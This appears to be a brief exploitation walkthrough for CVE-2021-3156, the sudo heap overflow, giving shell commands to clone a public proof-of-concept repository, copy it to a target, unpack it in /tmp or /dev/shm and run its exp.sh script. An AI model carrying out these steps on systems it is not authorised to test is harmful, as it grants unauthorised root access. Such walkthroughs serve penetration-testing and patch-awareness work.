CVE-2021-3156

In January 2021 Qualys released a blog post CVE-2021-3156: Heap-Based Buffer Overflow in Sudo (Baron Samedit) detailing a vulnerability that has existed in sudo for over a decade.

An Proof Of Concept by LockedByte can be used to exploit this vulnerability on unpatched systems.

git clone git@github.com:lockedbyte/CVE-Exploits.git

This repo contains a few different exploits, we only care about the contents of CVE-2021-3156. The quickest way to get this to our target is to compress the directory

tar -cvzf exploit.tgz CVE-2021-3156

Once compressed use your preferred method to copy exploit.tgz to your target. Once copied over & extract into either /tmp or /dev/shm which should be writable by any user.

tar -zxvf exploit.tgz

Once extracted change into the directory and run the exp.sh

cd CVE-2021-3156
chmod +x ./exp.sh
./exp.sh